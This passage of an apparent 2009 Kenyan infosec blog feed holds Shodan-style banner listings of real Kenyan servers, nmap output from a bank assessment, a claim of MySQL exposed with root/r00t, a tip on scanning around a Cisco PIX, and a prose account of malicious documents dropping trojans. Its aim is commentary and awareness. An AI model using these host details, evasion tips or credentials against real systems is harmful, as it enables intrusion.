/&gt;&lt;br /&gt;41.207.64.2&lt;br /&gt;Added on 06.11.2009&lt;br /&gt;&lt;br /&gt;forum.infinet.co.ke&lt;br /&gt;simba.infinet.co.ke&lt;br /&gt;mail.afolke.com&lt;br /&gt;&lt;br /&gt;HTTP/1.1 200 OK&lt;br /&gt;Date: Fri, 06 Nov 2009 18:30:51 GMT&lt;br /&gt;Server: Apache/2.2.8 (FreeBSD) mod_ssl/2.2.8 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.5 with Suhosin-Patch&lt;br /&gt;X-Powered-By: PHP/5.2.5&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html&lt;br /&gt;&lt;br /&gt;41.203.219.3&lt;br /&gt;Added on 06.11.2009&lt;br /&gt;&lt;br /&gt;41-203-219-3.onecom.co.ke&lt;br /&gt;&lt;br /&gt;HTTP/1.1 200 OK&lt;br /&gt;Date: Fri, 06 Nov 2009 18:25:29 GMT&lt;br /&gt;Server: Apache/2.0.63 (CentOS)&lt;br /&gt;X-Powered-By: PHP/5.1.6&lt;br /&gt;Set-Cookie: PHPSESSID=lagspeoct4op95bv0j1l047go5; path=/&lt;br /&gt;Expires: Thu, 19 Nov 1981 08:52:00 GMT&lt;br /&gt;Cache-Control: private&lt;br /&gt;Pragma: no-cache&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html; charset=UTF-8&lt;br /&gt;&lt;br /&gt;41.209.15.2&lt;br /&gt;Added on 04.11.2009&lt;br /&gt;&lt;br /&gt;uu-041-209-015-002.uunet.co.ke&lt;br /&gt;&lt;br /&gt;HTTP/1.1 200 OK&lt;br /&gt;Date: Wed, 04 Nov 2009 11:48:19 GMT&lt;br /&gt;Server: Apache/2.2.8 (Linux/SUSE)&lt;br /&gt;X-Powered-By: PHP/5.2.5&lt;br /&gt;Set-Cookie: 7a8fd2d9906865c24807e3d46bd56c5a=-; path=/&lt;br /&gt;Expires: Mon, 26 Jul 1997 05:00:00 GMT&lt;br /&gt;Last-Modified: Wed, 04 Nov 2009 11:48:22 GMT&lt;br /&gt;Cache-Control: no-store, no-cache, must-revalidate&lt;br /&gt;Cache-Control: post-check=0, pre-check=0&lt;br /&gt;Pragma: no-cache&lt;br /&gt;Vary: Accept-Encoding&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html&lt;br /&gt;&lt;br /&gt;41.207.64.1&lt;br /&gt;Added on 15.10.2009&lt;br /&gt;&lt;br /&gt;kifaru.infinet.co.ke&lt;br /&gt;&lt;br /&gt;HTTP/1.1 302 Found&lt;br /&gt;Date: Thu, 15 Oct 2009 04:37:13 GMT&lt;br /&gt;Server: Apache/2.2.3 (Red Hat)&lt;br /&gt;Location: https://kifaru.infinet.co.ke/&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html; charset=iso-8859-1&lt;br /&gt;&lt;br /&gt;41.209.15.1&lt;br /&gt;Added on 12.10.2009&lt;br /&gt;&lt;br /&gt;zomulogistics.co.ke&lt;br /&gt;childrensgarden.or.ke&lt;br /&gt;mail.saku.or.ke&lt;br /&gt;mail.shujaa.co.ke&lt;br /&gt;mail.tulipe.co.ke&lt;br /&gt;mail.mobinfo.co.ke&lt;br /&gt;tulipe.co.ke&lt;br /&gt;mobinfo.co.ke&lt;br /&gt;&lt;br /&gt;HTTP/1.1 302 Found&lt;br /&gt;Date: Mon, 12 Oct 2009 21:59:23 GMT&lt;br /&gt;Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch&lt;br /&gt;Location: http://shujaa.co.ke/root/?q=node/1&lt;br /&gt;Vary: Accept-Encoding&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html; charset=iso-8859-1&lt;br /&gt;&lt;br /&gt;76.12.158.75&lt;br /&gt;Added on 22.07.2009&lt;br /&gt;&lt;br /&gt;axistransline.co.ke&lt;br /&gt;&lt;br /&gt;HTTP/1.1 200 OK&lt;br /&gt;Date: Wed, 22 Jul 2009 23:19:28 GMT&lt;br /&gt;Server: Apache/2.2.3 (Red Hat)&lt;br /&gt;Last-Modified: Thu, 09 Jul 2009 20:09:10 GMT&lt;br /&gt;ETag: "44b000b-1c44-6dc3e580"&lt;br /&gt;Accept-Ranges: bytes&lt;br /&gt;Content-Length: 7236&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html; charset=UTF-8&lt;br /&gt;&lt;br /&gt;Have fun, and dont mess up the Internet.&lt;br /&gt;&lt;br /&gt;./Chuks&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;noscript&gt;&lt;/noscript&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-8709841232484662317?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/8709841232484662317/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=8709841232484662317' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8709841232484662317'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8709841232484662317'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/11/computer-search-scan-internet.html' title='Computer search, scan the internet'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_J9LOpyWWr2o/Sw-0iNCt_JI/AAAAAAAAAaE/8EbcT9dbPTg/s72-c/shodan.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-1450364079961038879</id><published>2009-11-22T12:29:00.007+03:00</published><updated>2009-11-24T16:35:29.551+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='research'/><title type='text'>Banks and goverments going to Security through obscurity</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/SwkRozriutI/AAAAAAAAAZ8/jUCcqICURPc/s1600/check2.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 400px; height: 144px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/SwkRozriutI/AAAAAAAAAZ8/jUCcqICURPc/s400/check2.png" alt="" id="BLOGGER_PHOTO_ID_5406872220400270034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Security through obscurity is something i have seen a lot of organizations using in Kenya that is Private and Government as well. But as this goes on, does it mean private and confidential data can never be compromised by the bad guys. I was doing a infosec assessment with a bank the other day and amazingly i found out that they were hiding systems behind their firewalls which were really vulnerable, but if you scanned their block very carefully without triggering the Cisco PiX you would get loads of info.&lt;br /&gt;&lt;br /&gt;A nmap scan to the mail server reported:&lt;br /&gt;&lt;br /&gt;PORT   STATE SERVICE VERSION&lt;br /&gt;25/tcp open  smtp    Cisco PIX sanitized smtpd&lt;br /&gt;Service Info: Device: firewall&lt;br /&gt;&lt;br /&gt;One thing the administrators didnt know is that, if you have such a disclosure just after scanning a mailserver, every attacker would know what he is dealing with. So any further attacks as from there gets blocked by an IPS which also blocks that IP and the attacker is aware of such information. Some of these organizations rarely inspects intrusions or perform incident handling so if attackers sees such info, then does research on what he has found and comes back after one year, the administrators or even the security team have no track of such attacks that must have happened 12 months ago from same range of IPs, then it becomes hard to protect such infrastructure.&lt;br /&gt;&lt;br /&gt;This becomes a serious issue and with good luck the attacker may get into very valuable info.&lt;br /&gt;&lt;br /&gt;After i realized that a Cisco PIX was blocking me, i decided to switch to another ISP network, and i ran through KDN and this time i was doing stealth scans going for the whole block and found mailservers and webservers, internet banking servers all gaping open to the internet. Amazingly some of these servers had &lt;span style="font-weight: bold;"&gt;MySql ports open with user root and password r00t&lt;/span&gt;. Several routers were also exposed to the internet,&lt;br /&gt;&lt;br /&gt;xxx.xxx.81.190):&lt;br /&gt;Not shown: 990 closed ports&lt;br /&gt;PORT      STATE    SERVICE      VERSION&lt;br /&gt;23/tcp    open     telnet       Cisco router&lt;br /&gt;79/tcp    open     finger       Cisco fingerd&lt;br /&gt;139/tcp   filtered netbios-ssn&lt;br /&gt;445/tcp   filtered microsoft-ds&lt;br /&gt;465/tcp   filtered smtps&lt;br /&gt;808/tcp   filtered ccproxy-http&lt;br /&gt;1002/tcp  filtered windows-icfw&lt;br /&gt;3918/tcp  filtered unknown&lt;br /&gt;4004/tcp  filtered unknown&lt;br /&gt;34573/tcp filtered unknown&lt;br /&gt;Service Info: OS: IOS; Device: router&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_J9LOpyWWr2o/SwkLqSxjwKI/AAAAAAAAAZ0/aFIqB0vvWN0/s1600/check.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 222px; height: 125px;" src="http://4.bp.blogspot.com/_J9LOpyWWr2o/SwkLqSxjwKI/AAAAAAAAAZ0/aFIqB0vvWN0/s400/check.png" alt="" id="BLOGGER_PHOTO_ID_5406865648857104546" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So as far as security through obscurity is concerned, i think its not a good option especially for fanancial institutions. For government institutions its also a bad deal, since if you look at network infrastructures like KRA, such systems aren't carefully protected, such that if there is an attack, and incidents like deletion of information or change of information etc, then there would be lack of Integrity and availability of data to authorized users and to the tax payers.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-1450364079961038879?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/1450364079961038879/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=1450364079961038879' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/1450364079961038879'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/1450364079961038879'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/11/banks-and-goverments-going-to-security.html' title='Banks and goverments going to Security through obscurity'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_J9LOpyWWr2o/SwkRozriutI/AAAAAAAAAZ8/jUCcqICURPc/s72-c/check2.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-6989628116390111114</id><published>2009-11-04T18:12:00.003+03:00</published><updated>2009-11-04T18:24:36.940+03:00</updated><title type='text'>Str0ke passes away</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_J9LOpyWWr2o/SvGb-A4q8GI/AAAAAAAAAZs/oLvqTs8Ebp4/s1600-h/milw0rm-wi_bigger.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 73px; height: 73px;" src="http://2.bp.blogspot.com/_J9LOpyWWr2o/SvGb-A4q8GI/AAAAAAAAAZs/oLvqTs8Ebp4/s400/milw0rm-wi_bigger.jpg" alt="" id="BLOGGER_PHOTO_ID_5400268917885825122" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Str0ke founder of Milworm just passed away after cardiac arrest this morning, an issue he had since childhood.&lt;br /&gt;&lt;br /&gt;This was the reason his site and tweeter feed wasn't updated in quite a while.&lt;br /&gt;&lt;br /&gt;RIP str0ke, and God be with you and your family.&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-6989628116390111114?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/6989628116390111114/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=6989628116390111114' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6989628116390111114'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6989628116390111114'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/11/strke-passes-away.html' title='Str0ke passes away'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_J9LOpyWWr2o/SvGb-A4q8GI/AAAAAAAAAZs/oLvqTs8Ebp4/s72-c/milw0rm-wi_bigger.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-8363661818587391659</id><published>2009-11-04T08:29:00.002+03:00</published><updated>2009-11-04T08:36:33.490+03:00</updated><title type='text'>hey</title><content type='html'>Hi guys.&lt;br /&gt;&lt;br /&gt;I haven't been able to blog lately, busy with work and organizing the hack battle. You can also follow me in twitter @chuksjonia to know what happening with me in the world of Infosec and i will follow u right back.&lt;br /&gt;&lt;br /&gt;There is also some education stuff that will be blogged soon so keep check this site.&lt;br /&gt;&lt;br /&gt;regards&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-8363661818587391659?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/8363661818587391659/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=8363661818587391659' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8363661818587391659'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8363661818587391659'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/11/hey.html' title='hey'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-7434282821705275685</id><published>2009-09-28T13:58:00.005+03:00</published><updated>2009-09-29T12:54:04.255+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='research'/><title type='text'>Malicious documents and their attempts to attacks</title><content type='html'>Recently been doing ongoing research on using malware when pentesting. A lot of Banks and networks are still vulnerable to these attacks and they still dont know it. Its very important for any pentester who is already in an engagement with such a client, to find such holes before the unethical do it.&lt;br /&gt;&lt;br /&gt;So, most of the documents downloaded or attached in an email e.g PDFs, DOCs, PPTs, etc that is infected will have a shellcode, that will do the following: Will have a trojan downloaded from a rogue webserver somewhere in the internet. Then it will write the executable in your system32 folder, and execute the file.&lt;br /&gt;&lt;br /&gt;This attack will only work if the user is a local administrator, or has administration privileges to write to system32, and this where you will find none of the windows workstation will work without the admin user.&lt;br /&gt;&lt;br /&gt;There are several ways to secure this, that i may have to  specify in the next blog entry. Keep tuned.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-7434282821705275685?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/7434282821705275685/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=7434282821705275685' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7434282821705275685'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7434282821705275685'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/09/malicous-documents-attempts-to-attacks.html' title='Malicious documents and their attempts to attacks'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-4470628482375989605</id><published>2009-09-22T13:56:00.002+03:00</published><updated>2009-09-22T14:02:04.506+03:00</updated><title type='text'>MetaSploit Unleashed</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_J9LOpyWWr2o/Sriuh_VCDSI/AAAAAAAAAZk/14t5XA8GxQQ/s1600-h/msfu-01.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 80px;" src="http://4.bp.blogspot.com/_J9LOpyWWr2o/Sriuh_VCDSI/AAAAAAAAAZk/14t5XA8GxQQ/s400/msfu-01.jpg" alt="" id="BLOGGER_PHOTO_ID_5384245253479992610" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Hi.&lt;br /&gt;&lt;br /&gt;For those who haven't heard, the Metasploit course has been released and for you to get the full course, u need to visit offensive security site for more details. The public course material can be found here, http://www.offensive-security.com/metasploit-unleashed&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-4470628482375989605?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/4470628482375989605/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=4470628482375989605' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4470628482375989605'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4470628482375989605'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/09/metasploit-unleashed.html' title='MetaSploit Unleashed'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_J9LOpyWWr2o/Sriuh_VCDSI/AAAAAAAAAZk/14t5XA8GxQQ/s72-c/msfu-01.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-7061730979204997111</id><published>2009-09-09T17:30:00.004+03:00</published><updated>2009-09-09T17:35:31.398+03:00</updated><title type='text'>SecureICT day two</title><content type='html'>Second day at secureICT.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_J9LOpyWWr2o/Sqe85VEDcrI/AAAAAAAAAZc/i_LEv_h3zug/s1600-h/IMG_7710.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 267px;" src="http://2.bp.blogspot.com/_J9LOpyWWr2o/Sqe85VEDcrI/AAAAAAAAAZc/i_LEv_h3zug/s400/IMG_7710.JPG" alt="" id="BLOGGER_PHOTO_ID_5379475973010059954" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_J9LOpyWWr2o/Sqe8dW4BBQI/AAAAAAAAAZU/fZ8SKI8Ezxo/s1600-h/p8110273.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 300px;" src="http://4.bp.blogspot.com/_J9LOpyWWr2o/Sqe8dW4BBQI/AAAAAAAAAZU/fZ8SKI8Ezxo/s400/p8110273.jpg" alt="" id="BLOGGER_PHOTO_ID_5379475492460102914" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/Sqe8QXT2RQI/AAAAAAAAAZM/85o6elyHZqs/s1600-h/p8100263.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 300px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/Sqe8QXT2RQI/AAAAAAAAAZM/85o6elyHZqs/s400/p8100263.jpg" alt="" id="BLOGGER_PHOTO_ID_5379475269238539522" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-7061730979204997111?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/7061730979204997111/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=7061730979204997111' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7061730979204997111'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7061730979204997111'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/09/secureict-day-two.html' title='SecureICT day two'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_J9LOpyWWr2o/Sqe85VEDcrI/AAAAAAAAAZc/i_LEv_h3zug/s72-c/IMG_7710.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3159574043258146292</id><published>2009-09-09T15:27:00.007+03:00</published><updated>2009-09-09T15:39:17.531+03:00</updated><title type='text'>SecureICT day one</title><content type='html'>Hi guys, This is how day one was at SecureICT&lt;br /&gt;&lt;br /&gt;&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/SqehcJJPO0I/AAAAAAAAAZE/b5VV3S6dqgI/s1600-h/IMG_2758.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 300px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/SqehcJJPO0I/AAAAAAAAAZE/b5VV3S6dqgI/s400/IMG_2758.JPG" alt="" id="BLOGGER_PHOTO_ID_5379445784780421954" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_J9LOpyWWr2o/SqehPe8QcII/AAAAAAAAAY8/GvOvs3Peo-w/s1600-h/IMG_2757.JPG"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 400px; height: 300px;" src="http://3.bp.blogspot.com/_J9LOpyWWr2o/SqehPe8QcII/AAAAAAAAAY8/GvOvs3Peo-w/s400/IMG_2757.JPG" alt="" id="BLOGGER_PHOTO_ID_5379445567293255810" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_J9LOpyWWr2o/Sqeg_qa-r7I/AAAAAAAAAY0/1veBxT3Hlyc/s1600-h/IMG_2756.JPG"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 400px; height: 300px;" src="http://2.bp.blogspot.com/_J9LOpyWWr2o/Sqeg_qa-r7I/AAAAAAAAAY0/1veBxT3Hlyc/s400/IMG_2756.JPG" alt="" id="BLOGGER_PHOTO_ID_5379445295496998834" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/Sqegs8_Mc8I/AAAAAAAAAYs/hCCqDkxlREc/s1600-h/IMG_2744.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 300px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/Sqegs8_Mc8I/AAAAAAAAAYs/hCCqDkxlREc/s400/IMG_2744.JPG" alt="" id="BLOGGER_PHOTO_ID_5379444974063219650" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_J9LOpyWWr2o/Sqef8D5B8yI/AAAAAAAAAYk/z_JqlNFfmVg/s1600-h/IMG_2742.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 300px;" src="http://3.bp.blogspot.com/_J9LOpyWWr2o/Sqef8D5B8yI/AAAAAAAAAYk/z_JqlNFfmVg/s400/IMG_2742.JPG" alt="" id="BLOGGER_PHOTO_ID_5379444134102823714" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/SqefwiTx5XI/AAAAAAAAAYc/STdeh_r751I/s1600-h/IMG_2741.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 300px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/SqefwiTx5XI/AAAAAAAAAYc/STdeh_r751I/s400/IMG_2741.JPG" alt="" 